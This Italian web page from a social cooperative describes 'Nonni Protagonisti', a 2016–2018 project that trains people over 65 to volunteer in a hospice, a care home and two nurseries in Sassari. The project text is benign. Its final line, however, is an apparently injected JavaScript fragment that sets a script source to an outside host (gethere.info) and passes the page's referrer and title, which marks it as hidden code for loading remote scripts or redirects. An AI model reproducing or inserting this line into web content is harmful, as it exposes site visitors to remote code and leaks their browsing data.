Nonni Protagonisti

logo_progetto

Realizzato da:

coop

In collaborazione con:

UC Audit CMYK VETT

 

nonniLa Cooperativa Sociale Nuova Era onlus di Latina in collaborazione con le Cooperative Sociali Altri Colori di Frosinone e Samidad di Lanciano (CH), hanno attivato nel mese di novembre 2016 il progetto nazionale intitolato “Nonni Protagonisti”, nei territori, rispettivamente, di Latina, Sassari e Celenza sul Trigno (CH).

Il Progetto – realizzato in collaborazione con UniCredit Foundation – è stato selezionato dal Comitato Carta Etica, interno a UniCredit, in collaborazione con il Cergas dell’Università Bocconi di Milano all’interno del “Bando UniCredit Carta E” come progetto innovativo che vede gli anziani sia in qualità di utenti che come soggetti attivi e ne valorizza il ruolo sociale e l’inclusione nella comunità.

Il Progetto, che avrà la durata di 24 mesi (novembre 2016-ottobre 2018) e verrà svolto all’interno di tre Regioni (Lazio, Sardegna, Abbruzzo), si rivolge al target di anziani attivi over 65, in particolare a 30 anziani, 10 per ogni sede, che verranno selezionati e formati per poi svolgere attività di volontariato all’interno di strutture dedicate a utenze differenti:

  • Hospice San Marco di Latina
  • RSA “Il Chiostro” di Celenza sul Trigno (CH)

All’interno di un Reparto di Hospice e di una RSA (Residenza sanitaria assistenziale), in quanto molto spesso le persone ricoverate si trovano ad affrontare la malattia a volte anche in solitudine e questo li porta spesso ad avere difficoltà emotive e relazionali per le quali la presenza di volontari può essere una forma di grande sostegno.

  • Asili Nido Comunali “Via Madrid” e “Via Cottoni” di Sassari

All’interno di due Asili Nido comunali, per favorire lo scambio intergenerazionale al fine di far “rivivere” e restituire all’anziano una dimensione progettuale sul domani che lo renda protagonista in prima persona della propria vita; contestualmente, ai bambini iscritti al nido, viene permesso di allacciare relazioni significative con altri adulti al di fuori della loro famiglia.

L’intento del Progetto è quello di mostrare come soggetti solitamente ritenuti a carico della popolazione siano, di contro, portatori di potenzialità troppo spesso inespresse, accrescendo e favorendo la capacità individuale dell’anziano di inserimento efficace nel circuito sociale ed economico della comunità,  migliorandone la qualità della vita.

Per lo svolgimento del progetto le Cooperative sociali partners hanno intrecciato intese e convenzioni con Enti pubblici e privati appartenenti ai diversi territori, creando una rete efficace tra privato sociale, fondazioni, Enti territoriali, Associazioni di categoria, ecc. in grado di poter fronteggiare a bisogni sociali sempre più urgenti.


La locandina

Il depliant


Per informazioni: nonni@nuovaeracoop.it

37346709-facebook

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;